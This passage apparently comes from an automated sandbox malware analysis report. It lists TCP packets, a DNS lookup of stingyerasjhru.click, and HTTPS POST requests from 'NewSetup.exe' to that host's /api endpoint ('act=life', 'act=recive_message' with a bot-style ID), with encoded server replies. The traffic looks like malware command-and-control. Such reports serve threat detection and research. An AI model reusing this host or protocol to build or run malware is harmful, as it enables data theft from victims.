                                                                                                    Dec 27, 2024 22:40:03.154387951 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:03.154517889 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:03.154584885 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:03.155221939 CET49711443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:03.155245066 CET44349711172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:03.281274080 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:03.281316996 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:03.281413078 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:03.282043934 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:03.282057047 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:04.492995977 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:04.493218899 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:04.494421959 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:04.494438887 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:04.494647026 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:04.495874882 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:04.495985985 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:04.496016979 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:04.496083975 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:04.496092081 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.479718924 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.479840994 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.479906082 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.480042934 CET49713443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.480057955 CET44349713172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.661590099 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.661652088 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:05.661730051 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.661983967 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:05.661998987 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.967978001 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.968158960 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.969396114 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.969408989 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.969635010 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.971303940 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971491098 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971520901 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:06.971582890 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:06.971589088 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928045988 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928142071 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:07.928189993 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:07.928277016 CET49714443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:07.928292990 CET44349714172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:08.297163963 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297198057 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:08.297262907 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297838926 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:08.297868013 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.559804916 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.559895992 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.561094999 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.561110020 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.561316967 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:09.562509060 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.562602997 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:09.562608957 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290412903 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290668964 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.290734053 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.290843964 CET49724443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.290862083 CET44349724172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.845419884 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845539093 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:11.845638990 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845902920 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:11.845940113 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.103359938 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.103475094 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.104660034 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.104692936 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.104938984 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.133054018 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.133783102 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.133837938 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.133977890 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134013891 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.134500027 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134547949 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.134728909 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.134792089 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135279894 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135339022 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135566950 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135610104 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135637045 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135665894 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135833025 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.135890007 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.135937929 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.136126041 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.136171103 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179372072 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179693937 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179775953 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179817915 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179845095 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.179920912 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.179956913 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:13.180005074 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:13.180021048 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.656842947 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.656945944 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.660073042 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.677378893 CET49732443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.677408934 CET44349732172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.730690956 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.730737925 CET44349743172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:15.730801105 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.731154919 CET49743443192.168.2.6172.67.157.249
                                                                                                    Dec 27, 2024 22:40:15.731168032 CET44349743172.67.157.249192.168.2.6
                                                                                                    Dec 27, 2024 22:40:16.063147068 CET49743443192.168.2.6172.67.157.249

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Dec 27, 2024 22:39:56.139700890 CET5369653192.168.2.61.1.1.1
                                                                                                    Dec 27, 2024 22:39:56.367433071 CET53536961.1.1.1192.168.2.6

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Dec 27, 2024 22:39:56.139700890 CET192.168.2.61.1.1.10x86dStandard query (0)stingyerasjhru.clickA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 27, 2024 22:39:56.367433071 CET1.1.1.1192.168.2.60x86dNo error (0)stingyerasjhru.click172.67.157.249A (IP address)IN (0x0001)false
                                                                                                    Dec 27, 2024 22:39:56.367433071 CET1.1.1.1192.168.2.60x86dNo error (0)stingyerasjhru.click104.21.58.80A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • stingyerasjhru.click

                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.649709172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:39:57 UTC267OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:39:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                    Data Ascii: act=life
                                                                                                    2024-12-27 21:39:58 UTC1137INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:39:58 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=hiavirq156lc2pp7nh7fk80rtu; expires=Tue, 22 Apr 2025 15:26:37 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F7qMe7P8wvYmwR1kw4D%2B86B1UoRgro3chN9ZAD9CdHHkstkZBh0nJehdhRNL%2B92QQz1PmJbnff%2BBcYZu99RMfCCeSD%2FLGY3MKwLFsHhbsYpTg1oU7Z5hVQ5anWAa%2FRDKf13bK9vhIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c775eecd5c32b-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1506&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=911&delivery_rate=1881443&cwnd=224&unsent_bytes=0&cid=c0ece0bb62b6517f&ts=749&x=0"
                                                                                                    2024-12-27 21:39:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                    Data Ascii: 2ok
                                                                                                    2024-12-27 21:39:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.649710172.67.157.2494435680C:\Users\user\Desktop\NewSetup.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-12-27 21:39:59 UTC268OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 52
                                                                                                    Host: stingyerasjhru.click
                                                                                                    2024-12-27 21:39:59 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 62 57 39 76 62 6e 70 36 65 47 26 6a 3d
                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--bW9vbnp6eG&j=
                                                                                                    2024-12-27 21:40:00 UTC1133INHTTP/1.1 200 OK
                                                                                                    Date: Fri, 27 Dec 2024 21:40:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=88ovts8mu0cmun4ehplahni4fj; expires=Tue, 22 Apr 2025 15:26:39 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    X-Frame-Options: DENY
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTdudavxNqWtc4F7YGs8BFV1cEOj%2BNZyh3AC2If7Dv8wE39PP6BeC14g7L9O1mxOgVVczuQtB6K6GLuT8nbDjIu5Do4dznbzL3Dn9C3dB25wyskF%2FSB%2BTuUX45jneScAITEUV6m1kw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8f8c776b89054401-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1643&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=956&delivery_rate=1777236&cwnd=233&unsent_bytes=0&cid=949d870d93d6564b&ts=777&x=0"
                                                                                                    2024-12-27 21:40:00 UTC236INData Raw: 34 39 31 63 0d 0a 5a 6a 74 63 55 54 69 42 76 42 74 43 34 62 55 77 32 41 33 69 62 7a 2b 61 49 46 37 47 52 56 2b 6b 65 4f 49 79 64 67 43 39 56 52 30 64 47 53 70 7a 41 72 57 51 4f 54 47 45 6c 77 71 73 66 35 63 4b 45 37 68 42 4f 75 52 2f 4f 63 55 55 6b 56 64 61 49 73 73 34 50 31 78 64 50 54 31 4c 35 4a 41 35 4a 35 6d 58 43 6f 4e 32 77 41 70 52 75 42 70 38 6f 79 38 39 78 52 53 41 55 78 31 76 7a 54 6c 2b 44 6c 63 37 4f 56 33 69 32 48 6f 75 6a 4e 42 56 76 57 79 49 41 56 62 33 53 44 50 6b 61 58 33 42 41 73 41 49 56 45 33 59 49 58 77 72 57 69 38 36 47 76 79 51 59 47 43 45 32 78 4c 69 4c 34 4d 4b 58 66 5a 47 4f 71 30 74 4e 38 77 63 67 56 59 63 63 4e 51 7a 64 51 35 5a 4f 44 68 58 36 38 78 33 4a 49 76 62 55 37
                                                                                                    Data Ascii: 491cZjtcUTiBvBtC4bUw2A3ibz+aIF7GRV+keOIydgC9VR0dGSpzArWQOTGElwqsf5cKE7hBOuR/OcUUkVdaIss4P1xdPT1L5JA5J5mXCoN2wApRuBp8oy89xRSAUx1vzTl+Dlc7OV3i2HoujNBVvWyIAVb3SDPkaX3BAsAIVE3YIXwrWi86GvyQYGCE2xLiL4MKXfZGOq0tN8wcgVYccNQzdQ5ZODhX68x3JIvbU7
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 64 73 77 45 4d 64 2f 31 70 38 2f 47 64 75 39 42 6d 52 51 51 46 76 7a 7a 45 2f 47 78 63 6e 63 31 33 76 6e 69 46 67 69 39 74 63 76 32 79 50 43 6c 7a 34 55 44 4f 6b 4a 44 58 4f 48 6f 70 66 47 32 33 52 50 58 67 4d 55 44 6b 38 58 65 76 59 64 69 50 44 6d 52 4b 39 64 38 42 56 48 64 68 53 50 36 63 7a 4d 4e 64 61 6e 78 34 4e 49 74 67 37 50 31 77 5a 4f 44 31 62 37 74 35 72 4b 49 6a 63 56 36 68 6b 69 51 42 51 2b 45 38 32 71 79 51 39 77 52 43 4b 58 78 35 6d 30 6a 70 35 42 46 6c 2b 66 52 72 6b 78 6a 6c 34 77 2f 52 58 71 6d 69 4d 47 78 2f 43 41 69 50 71 50 6e 33 42 46 73 41 49 56 47 72 61 4e 48 77 50 56 6a 30 37 55 66 48 65 61 79 61 4f 30 6b 43 38 61 6f 34 48 58 75 70 49 4d 71 49 6b 4e 4d 30 54 68 56 63 51 49 70 46 33 65 42 77 5a 5a 6e 4e 37 37 74 56 31 4b 70 54 58 45
                                                                                                    Data Ascii: dswEMd/1p8/Gdu9BmRQQFvzzE/Gxcnc13vniFgi9tcv2yPClz4UDOkJDXOHopfG23RPXgMUDk8XevYdiPDmRK9d8BVHdhSP6czMNdanx4NItg7P1wZOD1b7t5rKIjcV6hkiQBQ+E82qyQ9wRCKXx5m0jp5BFl+fRrkxjl4w/RXqmiMGx/CAiPqPn3BFsAIVGraNHwPVj07UfHeayaO0kC8ao4HXupIMqIkNM0ThVcQIpF3eBwZZnN77tV1KpTXE
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 4e 55 65 70 4f 4e 71 49 6f 4d 4d 70 61 7a 68 41 54 65 70 39 76 50 79 35 61 4b 6a 42 51 6f 65 74 36 4c 6f 33 51 52 50 70 77 7a 68 51 64 2f 30 35 38 2f 47 63 77 78 78 4b 47 51 68 74 76 33 44 6c 78 43 31 77 78 4f 31 72 6a 30 33 77 6b 69 4e 78 52 74 32 75 53 42 31 33 77 52 7a 32 75 4c 58 32 49 57 6f 64 49 56 44 71 66 42 6d 67 50 47 77 73 77 56 4f 33 5a 62 32 43 63 6d 55 76 36 61 49 78 4e 42 62 68 50 4e 4b 45 69 4d 73 63 51 6a 6c 55 65 62 74 63 35 66 42 5a 57 4f 6a 4e 57 36 39 52 30 4c 6f 66 66 57 37 46 6b 68 67 31 63 38 67 4a 79 35 43 41 6c 68 6b 4c 41 5a 42 4e 75 30 6a 67 39 4d 56 6f 77 50 56 33 31 6e 6d 5a 75 6d 70 64 56 74 69 2f 59 54 56 48 78 51 6a 65 75 49 7a 33 42 46 34 56 54 45 32 48 53 4d 48 55 4b 58 6a 6f 2f 55 2b 37 59 65 53 65 48 30 6b 43 2f 5a 6f
                                                                                                    Data Ascii: NUepONqIoMMpazhATep9vPy5aKjBQoet6Lo3QRPpwzhQd/058/GcwxxKGQhtv3DlxC1wxO1rj03wkiNxRt2uSB13wRz2uLX2IWodIVDqfBmgPGwswVO3Zb2CcmUv6aIxNBbhPNKEiMscQjlUebtc5fBZWOjNW69R0LoffW7Fkhg1c8gJy5CAlhkLAZBNu0jg9MVowPV31nmZumpdVti/YTVHxQjeuIz3BF4VTE2HSMHUKXjo/U+7YeSeH0kC/Zo
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 54 43 72 6b 4f 48 50 66 57 6f 64 63 56 44 71 66 50 6e 59 57 56 7a 41 36 56 2b 58 57 66 69 36 4f 33 46 53 78 61 49 63 4c 55 50 42 50 4f 61 63 6d 4f 63 77 49 67 31 73 65 62 39 56 33 4d 55 52 65 4a 6e 4d 43 6f 2f 6c 31 43 5a 50 4d 51 4b 77 76 6e 30 4e 45 75 45 55 77 35 48 39 39 78 52 57 4a 58 78 78 71 30 44 68 37 43 6c 38 34 50 6c 2f 73 31 47 73 6f 6a 64 70 5a 74 57 53 53 44 56 44 38 54 6a 69 73 4c 44 65 47 56 4d 42 58 44 43 4b 48 64 30 6f 4a 56 6a 34 77 54 4b 50 42 4e 7a 6e 44 30 46 37 36 4e 38 41 42 55 2f 68 4e 4d 4b 67 73 4e 63 63 57 6a 6c 63 52 61 39 63 2f 62 51 56 64 4e 6a 4a 55 37 4e 39 39 4a 59 62 54 56 62 35 70 6a 30 30 54 75 45 55 6b 35 48 39 39 36 54 32 31 45 6a 56 59 6e 79 67 78 48 52 6b 35 50 78 71 37 6e 6e 55 6a 6a 39 39 64 76 47 61 4d 42 31 54
                                                                                                    Data Ascii: TCrkOHPfWodcVDqfPnYWVzA6V+XWfi6O3FSxaIcLUPBPOacmOcwIg1seb9V3MUReJnMCo/l1CZPMQKwvn0NEuEUw5H99xRWJXxxq0Dh7Cl84Pl/s1GsojdpZtWSSDVD8TjisLDeGVMBXDCKHd0oJVj4wTKPBNznD0F76N8ABU/hNMKgsNccWjlcRa9c/bQVdNjJU7N99JYbTVb5pj00TuEUk5H996T21EjVYnygxHRk5Pxq7nnUjj99dvGaMB1T
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 79 4d 2b 77 68 2b 50 55 52 56 6b 7a 54 42 32 46 6c 63 7a 50 46 4c 72 31 33 67 6b 68 74 70 55 74 6d 57 42 43 6c 50 32 53 6e 7a 71 5a 7a 72 65 57 74 67 51 4e 58 4c 45 4a 57 6b 4a 65 44 4d 38 47 76 79 51 59 47 43 45 32 78 4c 69 4c 34 6b 66 57 66 56 51 4e 61 4d 70 4d 73 55 49 67 56 30 66 63 4e 67 34 65 77 4e 56 4f 44 78 63 34 74 74 7a 4c 49 54 53 57 62 56 6a 77 45 4d 64 2f 31 70 38 2f 47 63 54 7a 51 6d 58 55 78 70 70 79 53 77 2f 47 78 63 6e 63 31 33 76 6e 69 46 67 67 4e 78 5a 76 6d 2b 4d 44 56 6e 31 51 69 36 72 49 44 72 50 45 5a 4a 61 45 32 58 55 50 33 51 4c 58 79 77 2f 56 50 48 62 61 7a 4c 44 6d 52 4b 39 64 38 42 56 48 63 35 46 4c 4c 51 6b 66 2f 63 4d 67 30 59 66 62 39 4e 33 59 45 70 41 66 6a 52 57 6f 34 59 35 4a 6f 7a 65 55 62 56 75 69 51 46 51 2f 55 73 35
                                                                                                    Data Ascii: yM+wh+PURVkzTB2FlczPFLr13gkhtpUtmWBClP2SnzqZzreWtgQNXLEJWkJeDM8GvyQYGCE2xLiL4kfWfVQNaMpMsUIgV0fcNg4ewNVODxc4ttzLITSWbVjwEMd/1p8/GcTzQmXUxppySw/Gxcnc13vniFggNxZvm+MDVn1Qi6rIDrPEZJaE2XUP3QLXyw/VPHbazLDmRK9d8BVHc5FLLQkf/cMg0Yfb9N3YEpAfjRWo4Y5JozeUbVuiQFQ/Us5
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 30 55 73 6c 4d 50 49 73 42 35 5a 6b 52 65 4d 6e 4d 43 6f 39 31 2b 49 34 4c 64 57 37 5a 67 68 77 6c 50 38 6b 55 75 70 53 59 32 79 78 61 41 58 52 6c 6f 33 6a 35 79 43 46 51 35 4e 46 58 6d 6e 6a 64 67 68 4d 38 53 34 69 2b 68 41 46 62 30 47 57 62 6b 4f 48 50 66 57 6f 64 63 56 44 71 66 4e 33 55 42 55 7a 4d 77 56 65 44 4d 65 43 61 52 31 31 2b 77 66 59 6f 47 57 50 56 50 4d 61 63 68 4f 38 30 57 6b 6c 6b 55 59 64 52 33 4d 55 52 65 4a 6e 4d 43 6f 2f 31 75 4e 6f 6e 51 58 71 78 6b 67 51 35 4c 39 56 4a 38 36 6d 63 73 77 51 76 41 43 41 4a 79 79 44 42 67 53 6b 42 2b 4e 46 61 6a 68 6a 6b 6d 69 74 46 56 76 47 47 53 43 46 76 33 54 54 57 74 49 7a 58 46 47 6f 52 55 45 32 66 63 4f 33 51 44 57 6a 45 33 55 2b 33 58 64 6d 44 4e 6c 31 57 69 4c 39 68 4e 66 4f 4e 42 4d 4b 6c 6e 49
                                                                                                    Data Ascii: 0UslMPIsB5ZkReMnMCo91+I4LdW7ZghwlP8kUupSY2yxaAXRlo3j5yCFQ5NFXmnjdghM8S4i+hAFb0GWbkOHPfWodcVDqfN3UBUzMwVeDMeCaR11+wfYoGWPVPMachO80WklkUYdR3MUReJnMCo/1uNonQXqxkgQ5L9VJ86mcswQvACAJyyDBgSkB+NFajhjkmitFVvGGSCFv3TTWtIzXFGoRUE2fcO3QDWjE3U+3XdmDNl1WiL9hNfONBMKlnI
                                                                                                    2024-12-27 21:40:00 UTC1369INData Raw: 51 57 69 4c 59 4c 7a 39 63 47 52 34 34 54 4f 62 5a 62 32 4b 32 31 46 79 30 61 4a 5a 4e 51 73 63 4d 66 4b 73 39 66 5a 34 6a 6d 52 41 54 62 70 39 76 50 78 46 65 50 6a 52 41 39 64 6c 31 4d 59 6a 61 58 70 68 67 68 78 74 65 39 30 45 74 72 57 73 32 79 31 72 4f 45 42 4e 36 6e 32 38 2f 4b 31 34 6f 4d 48 58 67 7a 33 42 67 7a 5a 64 56 72 43 2f 59 54 57 4f 34 55 44 2b 30 4a 44 4c 58 4a 4d 41 49 44 56 79 66 50 47 6b 44 53 54 30 6c 55 65 37 53 61 42 37 44 6a 77 62 6f 50 64 4a 66 44 2b 63 43 49 35 74 70 66 63 64 61 32 47 6b 4e 49 73 6c 33 4a 31 59 58 66 69 45 61 75 35 34 2b 49 35 48 46 56 4c 6c 35 67 30 70 6a 78 6d 55 71 72 69 41 74 77 51 32 50 45 46 6f 69 30 48 63 6e 50 52 6b 33 4e 45 48 79 79 48 51 77 68 4a 64 74 39 43 2b 59 54 51 57 34 64 7a 2b 71 4b 54 72 51 43 38
                                                                                                    Data Ascii: QWiLYLz9cGR44TObZb2K21Fy0aJZNQscMfKs9fZ4jmRATbp9vPxFePjRA9dl1MYjaXphghxte90EtrWs2y1rOEBN6n28/K14oMHXgz3BgzZdVrC/YTWO4UD+0JDLXJMAIDVyfPGkDST0lUe7SaB7DjwboPdJfD+cCI5tpfcda2GkNIsl3J1YXfiEau54+I5HFVLl5g0pjxmUqriAtwQ2PEFoi0HcnPRk3NEHyyHQwhJdt9C+YTQW4dz+qKTrQC8
